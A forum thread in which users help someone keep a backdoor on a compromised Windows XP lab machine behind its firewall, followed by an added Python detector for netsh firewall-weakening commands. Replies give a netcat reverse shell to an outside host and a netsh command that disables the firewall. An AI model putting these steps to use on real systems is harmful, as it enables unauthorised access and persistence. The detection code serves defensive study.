Evade Firewall On Compromised Machine.



Posted (edited)

I'm trying to create a backdoor on a virtual XP SP2 machine with the firewall enabled.

I managed to get a meterpreter session on the machine.

I tried to install metsvc but it fails to bind.

Also I tried to install netcat and open a port using the netsh command in Windows.

But the port doesn't open.

Any other ideas?

c

PS: this is all practised in my virtual lab.

Edited by c0r
Posted

Hi C0R,

In order to create a reverse shell with NetCat you will need to do the following:

On your host, you have to listen for an incoming connection (thanks to -v, you'll get a quick note as soon as the shell connects):

netcat -v -l -p 3333

On the remote host, the following command has to be executed in order to establish a connection to your host:

netcat -e cmd.exe yourhost 3333

Try the above; if it doesn't work, let me know.

Regards,

Infiltrator

Posted (edited)

Are you trying port 455 (the one the tutorial you posted used as an example) or some other port?

My first instinct is that the Win firewall is blocking any unused port by default. So you could either try to get your netcat backdoor to work over an allowed port (like 80, 8080, 443, etc.) or put a rule into the firewall to explicitly allow incoming/outgoing traffic on the port of your choice.

I have the OpenBSD version of netcat (which is now the default version that Ubuntu comes with) and it won't let you use any of the first 1024 ports without root access. Not sure if the Win version is the same or not.

Edited by chikpee
Posted
I tried this howto Persistent netcat backdoor

but the firewall doesn't allow the connection!

c

That's kind of interesting, 'cause when I created a reverse shell with netcat on my VMs, I was able to get a reverse shell even with the firewall turned on.

Maybe you should try using the TCP ports mentioned (80, 443).

Posted

While we're on the subject of netcat...

...anyone know why the OpenBSD version (as I said above, now also the standard version packaged with Ubuntu) dropped the "-e" option?

Posted
I'm trying to create a backdoor on a virtual XP SP2 machine with the firewall enabled.

I managed to get a meterpreter session on the machine.

I tried to install metsvc but it fails to bind.

Also I tried to install netcat and open a port using the netsh command in Windows.

But the port doesn't open.

Any other ideas?

c

PS: this is all practised in my virtual lab.

Use netsh from the CLI. A quick Google produced:

http://www.windowsnetworking.com/articles_...s-Firewall.html

Posted

@hexophrenic: tried the netsh command... did not work. If you look at the Metasploit Unleashed howto you will see they use the netsh command.

@Infiltrator:

So you're saying it works! I'll have another go then...

c

Posted

netsh firewall set opmode mode=DISABLE will disable the firewall.

You can entirely control the firewall (assuming GP is absent) via CLI with appropriate local privs, or with GP if DA rights are available.

What error message did you get?
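Added defender-side example, not from the thread: a small Python checker that flags the netsh firewall commands discussed above when they show up in process-creation audit logs. The event fields, hosts and users are constructed for illustration; the "netsh advfirewall" forms are the Vista+ equivalents of the XP-era syntax the thread uses.

```python
import re
from dataclasses import dataclass

# netsh invocations that weaken the Windows Firewall. "netsh firewall" is the XP SP2
# syntax used in the thread; "netsh advfirewall" is the Vista+ equivalent to also catch.
NETSH_PATTERNS = [
    ("firewall_disabled", re.compile(r"\bnetsh(?:\.exe)?\b.*\bfirewall\s+set\s+opmode\s+(?:mode=)?disable\b", re.I)),
    ("firewall_disabled", re.compile(r"\bnetsh(?:\.exe)?\b.*\badvfirewall\s+set\s+\w+\s+state\s+off\b", re.I)),
    ("firewall_exception_added", re.compile(r"\bnetsh(?:\.exe)?\b.*\bfirewall\s+add\s+(?:portopening|allowedprogram)\b", re.I)),
    ("firewall_exception_added", re.compile(r"\bnetsh(?:\.exe)?\b.*\badvfirewall\s+firewall\s+add\s+rule\b", re.I)),
]

@dataclass
class Finding:
    record: str  # id of the source event, so an analyst can pivot back to it
    host: str
    user: str
    category: str
    command_line: str

def classify_command(cmdline):
    """Return the finding category for one command line, or None if it is benign."""
    for category, pattern in NETSH_PATTERNS:
        if pattern.search(cmdline):
            return category
    return None

def scan_events(events):
    """Run classify_command over process-creation events and keep only the hits."""
    findings = []
    for ev in events:
        category = classify_command(ev.get("CommandLine", ""))
        if category:
            findings.append(Finding(ev["Record"], ev["Host"], ev["User"], category, ev["CommandLine"]))
    return findings

# Constructed sample events (hypothetical hosts and users, not from the thread), shaped like
# the fields a process-creation audit log (Windows event 4688 / Sysmon event 1) carries.
SAMPLE_EVENTS = [
    {"Record": "1", "Host": "XPLAB01", "User": "XPLAB01\\admin", "CommandLine": "netsh firewall set opmode mode=DISABLE"},
    {"Record": "2", "Host": "XPLAB01", "User": "XPLAB01\\admin", "CommandLine": "netsh firewall add portopening TCP 139 NetBIOS ENABLE"},
    {"Record": "3", "Host": "XPLAB01", "User": "XPLAB01\\admin", "CommandLine": "netsh interface ip show config"},
    {"Record": "4", "Host": "WS7-02", "User": "CORP\\svc_deploy", "CommandLine": "NETSH.EXE AdvFirewall set allprofiles state off"},
    {"Record": "5", "Host": "WS7-02", "User": "CORP\\svc_deploy", "CommandLine": "netsh advfirewall firewall add rule name=svc dir=in action=allow protocol=TCP localport=8080"},
]
```

Record 3 is a benign netsh call and must not fire; the two "opmode" forms (with and without mode=) are both accepted because the legacy parser takes either.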

Posted (edited)

None... that's the weird part...

I'm trying it out on a newly installed XP SP2 now.

OK... I'm trying this on a fresh XP SP2 version.

I don't get any errors, the firewall adds the exceptions without any problem.

But when I try to connect with netcat to port 139 it times out.

nc -v 192.168.1.102 139

192.168.1.102: inverse host lookup failed: Unknown server error : Connection timed out

(UNKNOWN) [192.168.1.102] 139 (netbios-ssn) open

On the Windows machine I see the connection

TCP 192.168.1.102:139 192.168.1.106:44169 ESTABLISHED

for a short time... then it times out.

Any ideas?

c

Edited by c0r
Posted (edited)
None... that's the weird part...

I'm trying it out on a newly installed XP SP2 now.

OK... I'm trying this on a fresh XP SP2 version.

I don't get any errors, the firewall adds the exceptions without any problem.

But when I try to connect with netcat to port 139 it times out.

nc -v 192.168.1.102 139

192.168.1.102: inverse host lookup failed: Unknown server error : Connection timed out

(UNKNOWN) [192.168.1.102] 139 (netbios-ssn) open

On the Windows machine I see the connection

TCP 192.168.1.102:139 192.168.1.106:44169 ESTABLISHED

for a short time... then it times out.

Any ideas?

c

What you need to ensure is that you have one shell listening for incoming connections and the other shell making the outbound connection.

So the computer that you wish to turn off the monitor on should be making the connection out, and the computer from which you are going to remotely control it should be set to listen.

If all else fails, watch this video.

Edited by Infiltrator
Posted

Got it to work. Thx for the tips!

After the meterpreter session I disabled the Windows Firewall, then installed metsvc.

Also installing netcat worked.

c
